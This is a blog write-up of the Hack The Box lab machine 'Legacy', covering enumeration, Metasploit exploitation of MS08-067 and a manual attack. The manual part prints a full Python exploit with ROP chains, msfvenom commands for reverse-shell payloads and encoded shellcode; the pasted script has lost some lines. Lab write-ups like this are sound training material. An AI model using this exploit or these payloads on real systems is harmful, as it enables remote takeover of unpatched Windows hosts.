Hack The Box - Legacy

This post is an overview of my time working through the box “Legacy” found in HackTheBox

As part of the PEH course offered by Heath Adams (thecybermentor) I am completing a series of Hack the Box machines, the first of these is Legacy.

Nmap enumeration

# Nmap 7.91 scan initiated Sat Jun  5 09:49:51 2021 as: nmap -sC -sV -oN -Pn
Nmap scan report for
Host is up (0.047s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h35m28s, deviation: 2h07m16s, median: 4d23h05m28s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4d:3a (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-06-10T18:55:32+03:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  5 09:50:53 2021 -- 1 IP address (1 host up) scanned in 62.63 seconds

Based on this we gain some interesting insights, the host is running SMB, and it is a old OS windows XP

using the smb_version module on metasploit we gain some more information

msf6 auxiliary(scanner/smb/smb_version) > run

[*]        - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+]        -   Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB)
[*]           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

null authentication seems to be disabled

└─$ smbclient -L -U ""
Enter WORKGROUP\'s password: 
session setup failed: NT_STATUS_LOGON_FAILURE

running enum4linux we don’t really gain anything

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jun  5 10:05:42 2021

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: HTB

|    Nbtstat Information for    |
Looking up status of
	LEGACY          <00> -         B <ACTIVE>  Workstation Service
	HTB             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	LEGACY          <20> -         B <ACTIVE>  File Server Service
	HTB             <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	HTB             <1d> -         B <ACTIVE>  Master Browser
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

	MAC Address = 00-50-56-B9-4D-3A

|    Session Check on    |
[+] Server allows sessions using username '', password ''

|    Getting domain SID for    |
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

|    OS information on    |
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

|    Users on    |
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

|    Share Enumeration on    |
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

# nothing else of note

... SNIP  

eventually with some searchsploit and google fu I discovered a promising looking exploit, MS08-067

Metasploit exploitation

using the metasploit module windows/smb/ms08_067_netapi I was able to get a meterpreter shell back

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-06-05 10:24:57 -0400

from here it is really trivial to get the flags, running getsystem in metasploit we escalate our privileges and can navigate to user desktop’s to read both flags

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt

Manual exploitation

It’s always fun to try and push yourself to do something manually after using metasploit. I found a python script with searchsploit that looks promising

import struct
import time
import sys

from threading import Thread    #Thread is imported incase you would like to modify

    from impacket import smb
    from impacket import uuid
    from impacket import dcerpc
    from impacket.dcerpc.v5 import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'

print '#######################################################################'
print '#   MS08-067 Exploit'
print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'

print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'

print '#######################################################################\n'

#Reverse TCP shellcode from metasploit; port 443 IP; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;

#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)

#EXITFUNC=thread Important!

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python

shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
shellcode += "\x08\x9e\xe0"

nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10

disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"

ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";

module_base = 0x6f880000

def generate_rop(rvas):
	gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]	
	ret=struct.pack('<L', 0x00018000)
	ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
	ret+=struct.pack('<L', 0x01040110)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', 0x01010101)
	ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
	ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
	ret+=struct.pack('<L', rvas['jmp eax']+module_base)
	return ret

class SRVSVC_Exploit(Thread):

    def __init__(self, target, os, port=445):
     	super(SRVSVC_Exploit, self).__init__()

        self.__port   = port
        self.target   = target
		self.os	      = os

    def __DCEPacket(self):

	    if (self.os=='1'):

			print 'Windows XP SP0/SP1 Universal\n'
			ret = "\x61\x13\x00\x01"
			jumper = nonxjmper % (ret, ret)

		elif (self.os=='2'):

			print 'Windows 2000 Universal\n'
			ret = "\xb0\x1c\x1f\x00"
			jumper = nonxjmper % (ret, ret)

		elif (self.os=='3'):

			print 'Windows 2003 SP0 Universal\n'
			ret = "\x9e\x12\x00\x01"  #0x01 00 12 9e
			jumper = nonxjmper % (ret, ret)

		elif (self.os=='4'):

			print 'Windows 2003 SP1 English\n'
			ret_dec = "\x8c\x56\x90\x7c"  #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
			ret_pop = "\xf4\x7c\xa2\x7c"  #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
			jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
			disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
			jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)

		elif (self.os=='5'):

			print 'Windows XP SP3 French (NX)\n'
			ret = "\x07\xf8\x5b\x59"  #0x59 5b f8 07 
			disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 
			jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.

		elif (self.os=='6'):
			print 'Windows XP SP3 English (NX)\n'
			ret = "\x07\xf8\x88\x6f"  #0x6f 88 f8 07 
			disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 
			jumper = nonxjmper % (disable_nx, ret)  #the nonxjmper also work in this case.

		elif (self.os=='7'):
			print 'Windows XP SP3 English (AlwaysOn NX)\n'
			rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
			jumper = generate_rop(rvasets)+"AB"  #the nonxjmper also work in this case.

			print 'Not supported OS version\n'
			print '[-]Initiating connection'
			self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
			print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
			self.__dce = self.__trans.DCERPC_class(self.__trans)
			self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
			path = "\x5c\x00"+"ABCDEFGHIJ" * 10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00"  + jumper + "\x00" * 2
		server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
		prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
		self.__stub=server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" +  path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"

    def run(self):
        self.__dce.call(0x1f, self.__stub) 
        print 'Exploit finish\n'

if __name__ == '__main__':
		target = sys.argv[1]
		os = sys.argv[2]
	except IndexError:

		print '\nUsage: %s <target ip>\n' % sys.argv[0]
		print 'Example: MS08_067.py 1 for Windows XP SP0/SP1 Universal\n'
		print 'Example: MS08_067.py 2 for Windows 2000 Universal\n'


current = SRVSVC_Exploit(target, os)

first I re-generated my own shellcode so I will actually be able to get a callback, take note of the information given above the shellcode in the script as it instructs you how to generate owrking shellcode

#Reverse TCP shellcode from metasploit; port 443 IP; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;

#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)

#EXITFUNC=thread Important!

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python

The comment says use a payload of 380 bytes, so I decided for 410 with 30 bytes for unpacking, I cannot generate a payload of 380, the closed msfvenom could do was 378, so I added two more NOPs to keep at 410

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=53 EXITFUNC=thread -f python -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -s 410 -n 30 -v shellcode


shellcode="\x90" * 32

shellcode+= "\x37\x37\x9f\x27\x99\x4a\x91\x4b\x43\x48\x49\xd6\x98"   
shellcode+= "\x93\x9f\xf9\xd6\x3f\xf8\x3f\x43\xf9\x4a\x93\x4b\x48"    
shellcode+= "\x48\x37\x41\x92\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff" 
shellcode+= "\xff\xc0\x5e\x81\x76\x0e\x93\x91\x98\xeb\x83\xee\xfc"  
shellcode+= "\xe2\xf4\x6f\x79\x1a\xeb\x93\x91\xf8\x62\x76\xa0\x58"  
shellcode+= "\x8f\x18\xc1\xa8\x60\xc1\x9d\x13\xb9\x87\x1a\xea\xc3" 
shellcode+= "\x9c\x26\xd2\xcd\xa2\x6e\x34\xd7\xf2\xed\x9a\xc7\xb3"  
shellcode+= "\x50\x57\xe6\x92\x56\x7a\x19\xc1\xc6\x13\xb9\x83\x1a"  
shellcode+= "\xd2\xd7\x18\xdd\x89\x93\x70\xd9\x99\x3a\xc2\x1a\xc1" 
shellcode+= "\xcb\x92\x42\x13\xa2\x8b\x72\xa2\xa2\x18\xa5\x13\xea"  
shellcode+= "\x45\xa0\x67\x47\x52\x5e\x95\xea\x54\xa9\x78\x9e\x65" 
shellcode+= "\x92\xe5\x13\xa8\xec\xbc\x9e\x77\xc9\x13\xb3\xb7\x90" 
shellcode+= "\x4b\x8d\x18\x9d\xd3\x60\xcb\x8d\x99\x38\x18\x95\x13"
shellcode+= "\xea\x43\x18\xdc\xcf\xb7\xca\xc3\x8a\xca\xcb\xc9\x14"  
shellcode+= "\x73\xce\xc7\xb1\x18\x83\x73\x66\xce\xf9\xab\xd9\x93"   
shellcode+= "\x91\xf0\x9c\xe0\xa3\xc7\xbf\xfb\xdd\xef\xcd\x94\x6e" 
shellcode+= "\x4d\x53\x03\x90\x98\xeb\xba\x55\xcc\xbb\xfb\xb8\x18" 
shellcode+= "\x80\x93\x6e\x4d\xbb\xc3\xc1\xc8\xab\xc3\xd1\xc8\x83" 
shellcode+= "\x79\x9e\x47\x0b\x6c\x44\x0f\x81\x96\xf9\x92\xe1\x9d"  
shellcode+= "\x96\xf0\xe9\x93\x91\xad\x62\x75\xfb\x88\xbd\xc4\xf9"
shellcode+= "\x01\x4e\xe7\xf0\x67\x3e\x16\x51\xec\xe7\x6c\xdf\x90" 
shellcode+= "\x9e\x7f\xf9\x68\x5e\x31\xc7\x67\x3e\xfb\xf2\xf5\x8f" 
shellcode+= "\x93\x18\x7b\xbc\xc4\xc6\xa9\x1d\xf9\x83\xc1\xbd\x71" 
shellcode+= "\x6c\xfe\x2c\xd7\xb5\xa4\xea\x92\x1c\xdc\xcf\x83\x57" 
shellcode+= "\x98\xaf\xc7\xc1\xce\xbd\xc5\xd7\xce\xa5\xc5\xc7\xcb"                 
shellcode+= "\xbd\xfb\xe8\x54\xd4\x15\x6e\x4d\x62\x73\xdf\xce\xad"                 
shellcode+= "\x6c\xa1\xf0\xe3\x14\x8c\xf8\x14\x46\x2a\x78\xf6\xb9"                 
shellcode+= "\x9b\xf0\x4d\x06\x2c\x05\x14\x46\xad\x9e\x97\x99\x11"                 
shellcode+= "\x63\x0b\xe6\x94\x23\xac\x80\xe3\xf7\x81\x93\xc2\x67"                 
shellcode+= "\x3e"

running the script

we get back a reverse shell

from here it is the same process as before to read the flags

closing remarks

This box was quite fun especially trying to get the manual part functioning

Thank you for reading.

 Date: June 5, 2021

⏪ Under The Wire

Hack The Box - Devel ⏩